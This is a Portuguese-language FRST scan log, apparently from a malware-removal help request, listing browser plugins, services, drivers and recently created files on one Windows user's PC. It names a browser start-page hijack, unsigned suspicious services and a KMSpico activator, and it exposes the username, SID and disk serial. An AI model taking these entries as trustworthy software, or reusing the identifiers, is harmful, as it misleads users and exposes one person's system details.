FF Plugin HKU\S-1-5-21-2306744415-2254712149-2456193828-1001: @skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Helder\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2013-11-06] (Skype Limited)
FF Plugin HKU\S-1-5-21-2306744415-2254712149-2456193828-1001: gastecnologia.com.br/sf/bb64 -> C:\Users\Helder\AppData\Local\GAS Tecnologia\GBBD\npsf_bb_64.dll [Nenhum Arquivo]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
Chrome:
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://google.com/"
CHR Profile: C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default [2017-03-22]
CHR Extension: (Docs) - C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-22]
CHR Extension: (Google Drive) - C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-22]
CHR Extension: (YouTube) - C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-22]
CHR Extension: (Gmail) - C:\Users\Helder\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-22]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-27]
CHR HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fabhkdeopjkcpkmofliimbjckmocfiom] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-27]
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1490115988&z=21e223b3f0c97db3c281da1g7zccaefozzjcktmlma&from=che0812&uid=ST750LM022XHN-M750MBB_S2VPJ5CF102364102364
==================== Serviços (Whitelisted) ====================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
R2 ArcGIS License Manager; C:\Program Files (x86)\ArcGIS\License10.2\bin\lmgrd.exe [1452408 2013-11-13] (Flexera Software LLC)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1747800 2017-02-16] (Intel Security)
R2 COMLegService; C:\Program Files (x86)\Legendas-3.5\srvlegendas.exe [1855488 2016-01-23] () [Arquivo não assinado]
R2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2557136 2015-02-26] (Dell Inc.)
R2 DellDataVaultWiz; C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe [201936 2015-02-26] (Dell Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
R2 ed2kidle; C:\Program Files (x86)\amulell\ed2k.exe [214528 2017-03-10] (hxxp://www.amuleall.org/) [Arquivo não assinado]
R2 GbpSv; C:\Program Files (x86)\GbPlugin\gbpsv.exe [631520 2016-06-16] (GAS Tecnologia)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-18] (Hewlett-Packard Co.) [Arquivo não assinado]
R2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [Arquivo não assinado]
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek USB 2.0 Card Reader\RIconMan.exe [2464400 2012-09-08] (Realsil Microelectronics Inc.)
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [337888 2016-05-03] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation)
S2 KMS-R@1n; C:\Windows\[email]KMS-R@1n.exe[/email] [26112 2016-10-25] () [Arquivo não assinado]
R2 Kyubey; C:\Users\Helder\AppData\Roaming\Kyubey\Kyubey.exe [116736 2017-03-21] (Kyubey.exe) [Arquivo não assinado]
S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\LENOVO\easyplussdk\bin\EPHotspot64.exe [625648 2015-06-08] (Lenovo)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [188352 2017-02-22] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe [989632 2017-01-18] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.500\McCHSvc.exe [329480 2017-01-19] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.3.290.0\\McCSPServiceHost.exe [2054080 2017-02-04] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [1342904 2016-12-15] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [241040 2016-11-14] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [383032 2016-11-14] (McAfee, Inc.)
R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1465840 2016-12-22] (McAfee, Inc.)
S3 PDF Architect 3; C:\Program Files (x86)\PDF Architect 3\ws.exe [2244832 2015-09-17] (pdfforge GmbH)
S3 PDF Architect 3 CrashHandler; C:\Program Files (x86)\PDF Architect 3\crash-handler-ws.exe [964832 2015-09-17] (pdfforge GmbH)
R2 PDF Architect 3 Creator; C:\Program Files (x86)\PDF Architect 3\creator-ws.exe [767712 2015-09-17] (pdfforge GmbH)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1104304 2016-11-15] (Intel Security, Inc.)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [312056 2015-11-16] (Realtek Semiconductor)
S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [734912 2015-08-16] (@ByELDI) [Arquivo não assinado]
S3 ShareItSvc; C:\Program Files (x86)\Lenovo\SHAREit\Shareit.Service.exe [31192 2016-02-02] (SHAREit Technologies Co.Ltd)
R2 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [19288 2015-04-10] (Dell Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-08-03] (Synaptics Incorporated)
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [927280 2016-11-11] (GAS Tecnologia LTDA)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
R2 WindowsSecurity; C:\ProgramData\Windows Security\winsecurity.exe [1265152 2017-03-01] (Microsoft Corporation) [Arquivo não assinado] <==== ATENÇÃO
R2 WinSAPSvc; C:\Users\Helder\AppData\Roaming\WinSAPSvc\WinSAP.dll [218624 2017-03-22] (Windows) [Arquivo não assinado]
R2 WinSnare; C:\Users\Helder\AppData\Roaming\WinSnare\WinSnare.dll [774656 2017-03-22] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 YSearchUtilSvc; C:\Program Files (x86)\Yahoo!\yset\{C33963AB-A3DD-9F47-914A-17CECF5B23AB}\YSearchUtilSvc.exe [182736 2016-11-15] (Yahoo Inc.)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2013-03-02] (Atheros) [Arquivo não assinado]
S2 BepatSU; "C:\Users\Helder\AppData\Local\Temp\1\ttff.exe" /i [X] <==== ATENÇÃO
S2 BoxfatSU; "C:\WINDOWS\TEMP\nsiD264.tmp\ttff.exe" /i [X]
S2 FirefoxDL; "C:\WINDOWS\TEMP\nsiD264.tmp\QQBrowser.exe" -isvc [X]
===================== Drivers (Whitelisted) ======================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
S3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc.)
R3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [23760 2015-02-26] (Dell Computer Corporation)
R3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [23312 2015-02-26] (Dell Computer Corporation)
S3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-08-19] (Disc Soft Ltd)
R1 gbpddfac; C:\WINDOWS\System32\drivers\gbpddfac64.sys [28888 2017-03-22] (GAS Tecnologia)
R0 gbpddreg; C:\WINDOWS\System32\drivers\gbpddreg64.sys [29816 2017-03-22] (GAS Tecnologia)
R3 GBPRCM; C:\PROGRAM FILES (X86)\GBPLUGIN\gbprcm64.sys [29912 2015-08-26] (GAS Tecnologia)
S3 GENERICDRV; F:\Programas\Arquivos Dell\amifldrv64.sys [15400 2015-08-02] ()
R1 legendasdrv; C:\WINDOWS\System32\drivers\legendasdrv.sys [59120 2015-12-04] (Windows (R) Win 7 DDK provider)
S3 lehidmini; C:\WINDOWS\System32\drivers\leath_hid.sys [39704 2013-02-28] (Atheros)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2017-03-20] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc.)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85048 2016-11-18] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
S3 qca_shb; C:\WINDOWS\System32\drivers\qca_shb.sys [99328 2013-02-28] (Qualcomm Atheros Communications Inc.) [Arquivo não assinado]
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402960 2015-05-14] (Realsil Semiconductor Corporation)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-08-03] (Synaptics Incorporated)
S3 ssudserd; C:\WINDOWS\system32\DRIVERS\ssudserd.sys [214832 2015-12-08] (DEVGURU Co., LTD.(www.devguru.co.kr))
R3 Warsaw_PP; C:\Program Files (x86)\GbPlugin\wsftprp64.sys [24792 2014-10-31] (GAS Tecnologia LTDA)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
R1 wsddfac; C:\WINDOWS\System32\drivers\wsddfac.sys [28376 2017-03-22] (GAS Tecnologia)
R1 wsddntf; C:\WINDOWS\system32\DRIVERS\wsddntf.sys [47176 2016-11-11] (GAS Tecnologia)
S1 wsddpp; C:\WINDOWS\system32\drivers\wsddpp.sys [25184 2016-11-11] (GAS Tecnologia)
S3 wsddprm; C:\WINDOWS\system32\drivers\wsddprm.sys [25184 2016-11-11] (GAS Tecnologia)
==================== NetSvcs (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

==================== Três Meses Criados arquivos e pastas ========
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
2017-03-22 19:55 - 2017-03-22 19:57 - 00038824 _____ C:\Users\Helder\Desktop\FRST.txt
2017-03-22 19:55 - 2017-03-22 19:55 - 00000000 ____D C:\FRST
2017-03-22 19:54 - 2017-03-22 19:48 - 02424832 _____ (Farbar) C:\Users\Helder\Desktop\FRST64.exe
2017-03-22 19:49 - 2017-03-22 19:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2017-03-22 11:40 - 2017-03-22 11:40 - 00003584 _____ C:\WINDOWS\SECOH-QAD.dll
2017-03-22 07:33 - 2017-03-22 07:34 - 00000000 ____D C:\Program Files (x86)\BikaQRss
2017-03-22 07:33 - 2017-03-22 07:33 - 00003324 _____ C:\WINDOWS\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
2017-03-22 07:33 - 2017-03-22 07:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ
2017-03-22 07:32 - 2017-03-22 07:32 - 00000000 ____D C:\Program Files\k0chpihy
2017-03-22 06:07 - 2017-03-22 06:07 - 00000000 ____D C:\Program Files (x86)\58D23EE1_jumpeasy
2017-03-22 06:06 - 2017-03-22 07:33 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.3.6)
2017-03-21 18:53 - 2017-03-21 18:53 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-03-21 14:05 - 2017-03-21 14:05 - 00000000 ____D C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\amuleC
2017-03-21 14:05 - 2017-03-21 14:05 - 00000000 ____D C:\Users\Helder\AppData\Roaming\aMule
2017-03-21 14:05 - 2017-03-21 14:05 - 00000000 ____D C:\Program Files (x86)\amulell
2017-03-21 13:34 - 2017-03-22 07:35 - 00003666 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-03-21 13:34 - 2017-03-22 06:18 - 00000152 _____ C:\Users\Public\Documents\temp.dat
2017-03-21 13:34 - 2017-03-22 06:13 - 00000380 _____ C:\Users\Public\Documents\report.dat
2017-03-21 13:34 - 2017-03-21 13:34 - 00000000 ____D C:\Users\Helder\AppData\Roaming\Kyubey
2017-03-21 13:34 - 2017-03-21 13:34 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-21 13:34 - 2017-03-21 13:34 - 00000000 ____D C:\Program Files (x86)\deskapp
2017-03-21 13:34 - 2017-03-21 13:34 - 00000000 ____D C:\Program Files (x86)\58D15615_jumpeasy
2017-03-20 12:52 - 2017-03-22 07:33 - 00000000 ____D C:\Users\Helder\AppData\Roaming\WinSAPSvc
2017-03-20 12:52 - 2017-03-22 06:07 - 00000000 ____D C:\Users\Helder\AppData\Roaming\WinSnare
2017-03-20 12:46 - 2017-03-20 12:46 - 00000000 ____D C:\Program Files (x86)\MK
2017-03-20 11:46 - 2017-03-20 11:46 - 00001170 _____ C:\Users\Helder\Desktop\Jogotempo.lnk
2017-03-20 11:46 - 2017-03-20 11:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jogotempo
2017-03-20 11:46 - 2017-03-20 11:46 - 00000000 ____D C:\Program Files (x86)\Jogotempo
2017-03-20 11:45 - 2017-03-20 11:52 - 00000000 ____D C:\Users\Todos os Usuários\Windows Security
2017-03-20 11:45 - 2017-03-20 11:52 - 00000000 ____D C:\ProgramData\Windows Security
2017-03-20 11:45 - 2017-03-20 11:51 - 00000000 ____D C:\Program Files\XBox
2017-03-20 11:44 - 2017-03-22 11:30 - 00000000 ____D C:\Program Files (x86)\Qitech
2017-03-20 11:44 - 2017-03-20 11:45 - 00000000 ____D C:\Users\Helder\AppData\Roaming\Chenght
2017-03-20 11:44 - 2017-03-20 11:45 - 00000000 ____D C:\Users\Helder\AppData\Local\Coikitionateqesy
2017-03-20 11:44 - 2017-03-20 11:44 - 00006172 _____ C:\WINDOWS\System32\Tasks\Sheneghtcumele Launcher
2017-03-20 11:44 - 2017-03-20 11:44 - 00005158 _____ C:\WINDOWS\System32\Tasks\Sthiwardnerzodom
2017-03-20 11:44 - 2017-03-20 11:44 - 00000000 ____D C:\Users\Helder\AppData\Roaming\BrowserModule
2017-03-20 11:44 - 2017-03-20 11:44 - 00000000 ____D C:\Program Files (x86)\Sheneghtcumele Launcher
2017-03-20 11:43 - 2017-03-20 11:43 - 00001528 _____ C:\Users\Public\Desktop\Download Golden Softwar...lnk
2017-03-18 23:24 - 2017-03-18 23:28 - 00000000 ____D C:\Users\TEMP.HELDER.010\AppData\Local\ConnectedDevicesPlatform
2017-03-18 23:24 - 2017-03-18 23:28 - 00000000 ____D C:\Users\TEMP.HELDER.010
2017-03-18 09:01 - 2017-03-20 11:49 - 00000000 ____D C:\Program Files (x86)\WinCcac
2017-03-18 09:01 - 2017-03-18 09:42 - 00001066 _____ C:\Users\Public\Desktop\WinCcac.lnk
2017-03-18 09:01 - 2017-03-18 09:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinCcac
2017-03-14 15:45 - 2017-03-04 04:57 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-03-14 15:45 - 2017-03-04 04:57 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-03-14 15:45 - 2017-03-04 04:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-03-14 15:45 - 2017-03-04 04:24 - 00090976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2017-03-14 15:45 - 2017-03-04 04:19 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-03-14 15:45 - 2017-03-04 04:09 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-03-14 15:45 - 2017-03-04 04:09 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2017-03-14 15:45 - 2017-03-04 04:09 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-03-14 15:45 - 2017-03-04 04:09 - 00497416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-03-14 15:45 - 2017-03-04 04:08 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-03-14 15:45 - 2017-03-04 04:07 - 00557400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-03-14 15:45 - 2017-03-04 04:04 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-03-14 15:45 - 2017-03-04 04:04 - 01362512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-03-14 15:45 - 2017-03-04 04:02 - 00184416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2017-03-14 15:45 - 2017-03-04 03:56 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-03-14 15:45 - 2017-03-04 03:56 - 00248992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-03-14 15:45 - 2017-03-04 03:54 - 02277288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-03-14 15:45 - 2017-03-04 03:54 - 00524776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 00781152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-03-14 15:45 - 2017-03-04 03:53 - 00493912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-03-14 15:45 - 2017-03-04 03:53 - 00313568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-03-14 15:45 - 2017-03-04 03:53 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-03-14 15:45 - 2017-03-04 03:52 - 00549088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2017-03-14 15:45 - 2017-03-04 03:52 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2017-03-14 15:45 - 2017-03-04 03:51 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-03-14 15:45 - 2017-03-04 03:51 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-03-14 15:45 - 2017-03-04 03:50 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 06667528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 04023000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01853224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01202384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00981376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00976184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00530480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00352760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-03-14 15:45 - 2017-03-04 03:47 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-03-14 15:45 - 2017-03-04 03:46 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-03-14 15:45 - 2017-03-04 03:46 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2017-03-14 15:45 - 2017-03-04 03:45 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-03-14 15:45 - 2017-03-04 03:45 - 00112120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2017-03-14 15:45 - 2017-03-04 03:42 - 01415240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-03-14 15:45 - 2017-03-04 03:42 - 01260784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-03-14 15:45 - 2017-03-04 03:42 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-03-14 15:45 - 2017-03-04 03:42 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2017-03-14 15:45 - 2017-03-04 03:40 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-03-14 15:45 - 2017-03-04 03:36 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-03-14 15:45 - 2017-03-04 03:34 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-03-14 15:45 - 2017-03-04 03:30 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-03-14 15:45 - 2017-03-04 03:30 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-03-14 15:45 - 2017-03-04 03:30 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-03-14 15:45 - 2017-03-04 03:30 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2017-03-14 15:45 - 2017-03-04 03:30 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
